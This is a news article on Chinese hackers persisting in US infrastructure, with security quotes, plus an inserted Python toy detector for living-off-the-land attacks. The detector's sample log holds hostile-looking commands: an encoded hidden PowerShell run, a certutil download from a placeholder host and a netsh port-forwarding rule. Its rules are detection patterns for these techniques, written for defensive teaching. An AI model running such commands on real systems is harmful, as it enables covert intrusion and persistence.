Friday, February 16, 2024

Lurking for five years: How Chinese hackers infiltrated US infrastructure


By Dr. Tim Sandle
February 14, 2024

Image: © AFP/File Fred TANNEAU

U.S. law enforcement has reported that Chinese hackers remained hidden for up to five years inside U.S. infrastructure. As this news continues to develop, Andrew Hollister, CISO & VP Labs R&D at LogRhythm, considers what this means for U.S. national security and cyber-preparedness.

According to The Guardian, the FBI operation disrupted a botnet of hundreds of U.S.-based small office and home routers, owned by private citizens and companies, that had been hijacked by the Chinese hackers.

Hollister tells Digital Journal: “In light of the recent advisory from U.S. government agencies regarding cybersecurity threats, notably the infiltration of US infrastructure by Chinese hackers as disclosed, there’s a pressing need to reinforce proactive defense measures in today’s digital landscape.”

Looking at the advisory in more detail, Hollister thinks the length of time the hackers had access is the greatest concern: “An interesting aspect highlighted by the feedback is the duration of time that threat actors were able to persist. Early detection is emphasized as crucial in preventing threat actors from establishing long-term persistence, as seems to be the case in this report.”

Reviewing what the U.S. government plans to do next, Hollister considers: “The recommendations include implementing robust logging collection and patching strategies, which are considered fundamental steps towards bolstering cybersecurity resilience across organizations.”

There are other measures too, which Hollister calls out: “Furthermore, the advisory underscores the importance of a comprehensive approach to threat detection, emphasizing the monitoring and securing of critical applications beyond the immediate scope of the advisory.”

There are other areas that both government and business need to focus on. Hollister identifies: “Understanding and tracking potential vulnerabilities, such as those associated with Remote Desktop Protocol (RDP) connections, is deemed essential for identifying and mitigating risks effectively. The discussion also sheds light on the extent to which the broader concept of ‘living off the land’ (LotL) techniques were used, wherein threat actors leverage existing tools and features within target environments to evade detection.”

Living Off The Land (LotL) is a covert cyberattack technique in which criminals carry out malicious activities using legitimate IT administration tools.

It is in this area that resources need to be directed. Here Hollister recommends: “Maturing capabilities around detecting LotL attacks is seen as crucial for organizations to assure effective defense strategies. By focusing on detecting attacker tactics, techniques, and procedures (TTPs), organizations can enhance their ability to identify and respond to potential threats effectively.”
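The two passages above describe LotL activity (attackers using legitimate administration tools) and recommend maturing detection around attacker TTPs rather than around specific malware. The following added example, which is not part of the article or of any LogRhythm product, shows what that looks like in practice: a small detector that parses process-creation log lines and scores them against a handful of LotL patterns, raising the score when the tool is launched from a parent process that rarely spawns admin tooling. The log format (pipe-delimited: timestamp, host, user, parent image, image, command line), the sample lines, the rule list and the scores are all constructed for illustration and are not taken from the advisory.

```python
"""Toy living-off-the-land (LotL) detector over constructed process-creation logs.

Assumed (constructed) log format, one event per line:
    timestamp|host|user|parent_image|image|command_line
The rules are illustrative examples of commonly documented LotL tradecraft,
not the content of the advisory discussed in the article.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# (rule name, regex on image basename, regex on command line, base score)
RULES: List[Tuple[str, str, str, int]] = [
    ("powershell_encoded_command", r"^powershell\.exe$",
     r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 70),
    ("certutil_download", r"^certutil\.exe$", r"(?i)-urlcache\b", 60),
    ("netsh_portproxy_add", r"^netsh\.exe$", r"(?i)\bportproxy\s+add\b", 80),
]

# Parents that rarely launch admin tooling in normal operation (assumption).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe", "mshta.exe"}
PARENT_BONUS = 20


def parse_line(line: str) -> Optional[ProcessEvent]:
    """Split one log line into an event; return None for malformed lines so a
    bad record is skipped instead of stopping the whole pipeline."""
    parts = line.rstrip("\n").split("|", 5)  # maxsplit keeps '|' inside the command line
    if len(parts) != 6:
        return None
    return ProcessEvent(*parts)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def score_event(ev: ProcessEvent) -> List[Tuple[str, int]]:
    """Return (rule, score) for every rule the event matches.
    The score is the rule's base plus a bonus for a suspicious parent, capped at 100."""
    hits = []
    img = basename(ev.image)
    parent_bonus = PARENT_BONUS if basename(ev.parent) in SUSPICIOUS_PARENTS else 0
    for name, img_re, cmd_re, base in RULES:
        if re.search(img_re, img) and re.search(cmd_re, ev.cmdline):
            hits.append((name, min(base + parent_bonus, 100)))
    return hits


def detect(lines, threshold: int = 60) -> List[Dict]:
    """Run every line through the rules and keep findings at or above threshold."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        for name, score in score_event(ev):
            if score >= threshold:
                findings.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                                 "rule": name, "score": score, "cmdline": ev.cmdline})
    return findings


# Constructed sample log: three LotL-style events, one benign certutil use, one bad line.
SAMPLE_LOG = [
    "2024-02-10T03:14:07Z|WS-042|CORP\\jdoe|winword.exe"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==",
    "2024-02-10T03:15:30Z|WS-042|CORP\\jdoe|cmd.exe|C:\\Windows\\System32\\certutil.exe"
    "|certutil.exe -urlcache -split -f http://placeholder.invalid/x.txt x.txt",
    "2024-02-11T22:50:02Z|SRV-07|NT AUTHORITY\\SYSTEM|services.exe|C:\\Windows\\System32\\netsh.exe"
    "|netsh.exe interface portproxy add v4tov4 listenport=8443 connectaddress=10.10.5.20",
    "2024-02-12T09:00:00Z|WS-017|CORP\\asmith|explorer.exe|C:\\Windows\\System32\\certutil.exe"
    "|certutil.exe -hashfile report.pdf SHA256",
    "malformed line without delimiters",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} {f['user']} {f['rule']} score={f['score']}")
```

Run as a script it prints the three flagged events and stays silent on the benign `certutil -hashfile` use; in a real deployment the rule list would be tuned against an environment's own baseline of admin activity, since the whole point of LotL is that the tools themselves are legitimate and only their context (parent, user, time, arguments) gives the attacker away.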

Returning to the U.S. government, Hollister reminds both public and private sector bodies what they need to be focusing on the most: “The advisory serves as a call to action for organizations to prioritize proactive monitoring, threat hunting, and continuous improvement in their cybersecurity posture to mitigate risks effectively, regardless of the specific tools or solutions they employ.”
